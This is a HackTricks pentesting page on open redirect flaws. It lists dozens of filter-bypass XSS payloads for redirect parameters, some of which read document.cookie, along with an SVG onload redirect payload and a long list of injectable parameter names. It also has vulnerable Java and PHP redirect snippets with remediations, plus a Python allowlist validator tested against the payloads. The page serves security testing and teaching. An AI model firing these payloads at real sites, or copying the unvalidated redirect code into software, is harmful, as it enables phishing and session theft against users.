hacktricks/pentesting-web/open-redirect.md


Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)

Other ways to support HackTricks

Open Redirect

Redirect to localhost or arbitrary domains

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

Open Redirect to XSS

```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line comment, so a new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL of PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```

Open Redirect uploading svg files


Attack scenario

An attacker can use an open redirect vulnerability in the application to trick users into uploading a malicious SVG file, and have malicious actions executed when the user visits the URL that contains the malicious SVG file.

Attack description

The attacker uploads a malicious SVG file to the application and uses the open redirect vulnerability to build a malicious URL that redirects the user to the URL hosting the malicious SVG file. When the user visits that URL, the browser parses the SVG file and executes the malicious code inside it, and the attack succeeds.

Attack steps

  1. The attacker uploads a malicious SVG file to the application.
  2. The attacker builds a URL pointing at the malicious SVG file and uses the open redirect vulnerability to deliver it.
  3. The user visits the malicious URL; the browser parses the SVG file and executes the malicious code inside it.

Defense recommendations

  • The application's upload feature should strictly restrict the accepted file types and avoid accepting SVG files.
  • Verify that the redirect URL is within the application's control, so the open redirect vulnerability cannot be exploited.

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
```

Common injection parameters

An open redirect vulnerability exists when a web application allows a user to redirect to an external site by manipulating the URL. This can be exploited by an attacker to redirect users to malicious websites to perform phishing attacks or distribute malware. To identify open redirect vulnerabilities, testers can manipulate parameters commonly used for redirection, such as:

  • url
  • link
  • next
  • target

By injecting malicious URLs into these parameters, testers can determine if the application is vulnerable to open redirects.

```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```

Code examples

.Net

```
response.redirect("~/mysafe-subdomain/login.aspx")
```

Java

Open Redirect

An open redirect occurs when a web application redirects to a user-supplied link without proper validation. Attackers can abuse this vulnerability to redirect users to malicious websites, phishing pages, or other harmful content.

Example

Consider the following vulnerable Java code snippet:

```java
String redirectUrl = request.getParameter("redirect");
response.sendRedirect(redirectUrl);
```

In this example, the web application blindly redirects users to the URL specified in the redirect parameter without any validation. An attacker can craft a malicious link like http://vulnerable-website.com/?redirect=http://malicious-website.com to redirect users to a harmful website.

Prevention

To prevent open redirect vulnerabilities in Java web applications, always validate and sanitize user-supplied input before using it to redirect users. Whitelist allowed URLs or domains and ensure that the redirect URL belongs to the expected domain.

```java
// HttpServletResponse has no redirect() method; sendRedirect() issues the 302
response.sendRedirect("http://mysafedomain.com");
```

PHP

Open Redirect

An open redirect vulnerability exists when a web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. This can be abused by an attacker to craft a malicious link that redirects users to a phishing page or a malware download.

Example

Consider the following PHP code snippet:

```php
<?php
$redirect_url = $_GET['url'];
header('Location: ' . $redirect_url);
?>
```

In this code, the script takes a URL from the url parameter in the query string and redirects the user to that URL using the header() function. An attacker can exploit this by crafting a link like http://example.com/redirect.php?url=http://malicious-site.com.

Impact

The impact of an open redirect vulnerability includes phishing attacks, malware distribution, and social engineering attacks. It can be used in combination with other vulnerabilities to further compromise the security of a web application.

Remediation

To prevent open redirect vulnerabilities, always validate and sanitize user input before using it in a redirect. Whitelist allowed domains or use a safe redirect method that does not rely on user-controlled input.

```php
<?php
/* browser redirections */
header("Location: http://mysafedomain.com");
exit;
?>
```
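The Java and PHP remediations above say "whitelist allowed domains" without showing a check, and the "Open Redirect to XSS" list earlier shows why substring filters on "javascript:" fail. As an added example (not HackTricks' code), an allowlist-based redirect validator in Python, run against a sample of the page's own payloads; the host example.com and the naive_filter it is contrasted with are assumptions.

```python
from urllib.parse import urlsplit, unquote

ALLOWED_HOSTS = {"example.com"}  # constructed: the application's own host(s)

# Some payloads from the list above, as the raw query-string values an
# attacker would send (still URL-encoded, exactly as listed on this page).
SAMPLE_PAYLOADS = [
    "javascript:alert(1)",
    "java%0d%0ascript%0d%0a:alert(0)",
    "javascript://%250Aalert(1)",
    "%09Jav%09ascript:alert(document.domain)",
    "//%5cjavascript:alert(1)",
    "\\j\\av\\a\\s\\cr\\i\\pt\\:\\a\\l\\ert\\(1\\)",
    "/x:1/:///%01javascript:alert(document.cookie)/",
    "https://evil.example/login",          # plain open redirect, no XSS
    "https://example.com@evil.example/",   # userinfo trick
]

def naive_filter(value: str) -> bool:
    """The substring blocklist that the payloads above are built to defeat."""
    return "javascript:" not in value.lower() and not value.startswith("//")

def safe_redirect_target(value: str, allowed_hosts=ALLOWED_HOSTS):
    """Return a usable redirect target, or None so the caller falls back to '/'.
    Only same-host http(s) URLs and single-slash relative paths pass. The value
    is decoded once here because the list above is URL-encoded; a web framework
    normally hands the handler the already-decoded parameter."""
    target = unquote(value)
    # Control characters (CR, LF, TAB, NUL, ...) never belong in a real target;
    # browsers strip some of them, which is what the CRLF/tab payloads rely on.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return None
    if "\\" in target:  # browsers treat "\" as "/" in http(s) URLs
        return None
    parts = urlsplit(target)
    if parts.scheme:
        if parts.scheme not in ("http", "https"):
            return None  # javascript:, data:, vbscript:, ...
        if parts.hostname not in allowed_hosts:
            return None  # foreign host, including user@host tricks
        return target
    # Scheme-less: require a path-relative target, not protocol-relative //host.
    if parts.netloc or not target.startswith("/") or target.startswith("//"):
        return None
    return target

def rejected_by(check, payloads=SAMPLE_PAYLOADS):
    """Payloads a given check rejects (falsy result == rejected)."""
    return [p for p in payloads if not check(p)]
```

rejected_by(naive_filter) catches only four of the nine samples, while rejected_by(safe_redirect_target) catches all of them; an even simpler design is to never accept a URL at all and instead map a short token (for example next=account) to a server-side table of paths.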

Tools

Resources
